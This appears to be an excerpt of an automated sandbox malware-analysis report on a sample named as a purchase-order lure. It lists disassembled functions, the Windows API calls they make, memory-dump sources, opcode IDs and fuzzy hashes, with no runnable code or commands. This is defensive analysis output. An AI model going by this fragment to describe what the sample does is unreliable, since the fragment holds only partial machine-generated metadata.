                                                              • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                                              • RegisterClassW.USER32(00000001), ref: 00412428
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                              • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: HandleModule$ClassCreateRegisterWindow
                                                              • String ID:
                                                              • API String ID: 2678498856-0
                                                              • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                              • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                              • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                              • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                              APIs
                                                              • GetDlgItem.USER32(?,?), ref: 00409B40
                                                              • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                              • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                              • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Item
                                                              • String ID:
                                                              • API String ID: 3888421826-0
                                                              • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                              • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                              • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                              • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                              APIs
                                                              • memset.MSVCRT ref: 00417B7B
                                                              • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                              • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                              • GetLastError.KERNEL32 ref: 00417BB5
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: File$ErrorLastLockUnlockmemset
                                                              • String ID:
                                                              • API String ID: 3727323765-0
                                                              • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                              • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                              • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                              • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                              APIs
                                                              • memset.MSVCRT ref: 0040F673
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                                              • strlen.MSVCRT ref: 0040F6A2
                                                              • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                              • String ID:
                                                              • API String ID: 2754987064-0
                                                              • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                              • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                              • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                              • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                              APIs
                                                              • memset.MSVCRT ref: 0040F6E2
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                                              • strlen.MSVCRT ref: 0040F70D
                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                              • String ID:
                                                              • API String ID: 2754987064-0
                                                              • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                              • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                              • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                              • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                              APIs
                                                              • memset.MSVCRT ref: 00402FD7
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                              • strlen.MSVCRT ref: 00403006
                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                              • String ID:
                                                              • API String ID: 2754987064-0
                                                              • Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                              • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                              • Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                              • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                              APIs
                                                                • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                              • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                              • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                              • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                              • GetStockObject.GDI32(00000000), ref: 004143C6
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                              • String ID:
                                                              • API String ID: 764393265-0
                                                              • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                              • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                              • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                              • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                              APIs
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Time$System$File$LocalSpecific
                                                              • String ID:
                                                              • API String ID: 979780441-0
                                                              • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                              • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                              • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                              • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                              APIs
                                                              • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                              • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                              • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpy$DialogHandleModuleParam
                                                              • String ID:
                                                              • API String ID: 1386444988-0
                                                              • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                              • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                              • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                              • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                              APIs
                                                              • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                              • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: InvalidateMessageRectSend
                                                              • String ID: d=E
                                                              • API String ID: 909852535-3703654223
                                                              • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                              • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                              • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                              • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                              APIs
                                                              • wcschr.MSVCRT ref: 0040F79E
                                                              • wcschr.MSVCRT ref: 0040F7AC
                                                                • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: wcschr$memcpywcslen
                                                              • String ID: "
                                                              • API String ID: 1983396471-123907689
                                                              • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                              • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                              • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                              • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                              APIs
                                                                • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                              • _memicmp.MSVCRT ref: 0040C00D
                                                              • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: FilePointer_memicmpmemcpy
                                                              • String ID: URL
                                                              • API String ID: 2108176848-3574463123
                                                              • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                              • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                              • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                              • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                              APIs
                                                              • _snwprintf.MSVCRT ref: 0040A398
                                                              • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _snwprintfmemcpy
                                                              • String ID: %2.2X
                                                              • API String ID: 2789212964-323797159
                                                              • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                              • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                              • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                              • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _snwprintf
                                                              • String ID: %%-%d.%ds
                                                              • API String ID: 3988819677-2008345750
                                                              • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                              • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                              • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                              • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                              APIs
                                                              • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                                              • memset.MSVCRT ref: 00401917
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: PlacementWindowmemset
                                                              • String ID: WinPos
                                                              • API String ID: 4036792311-2823255486
                                                              • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                              • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                              • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                              • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                              APIs
                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                              • wcsrchr.MSVCRT ref: 0040DCE9
                                                              • wcscat.MSVCRT ref: 0040DCFF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: FileModuleNamewcscatwcsrchr
                                                              • String ID: _lng.ini
                                                              • API String ID: 383090722-1948609170
                                                              • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                              • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                              • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                              • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                              • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                              • API String ID: 2773794195-880857682
                                                              • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                              • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                              • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                              • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                              APIs
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                                              • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: LongWindow
                                                              • String ID: MZ@
                                                              • API String ID: 1378638983-2978689999
                                                              • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                              • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                                              • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                              • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                                              APIs
                                                              • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                              • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                              • memset.MSVCRT ref: 0042BAAE
                                                              • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID:
                                                              • API String ID: 438689982-0
                                                              • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
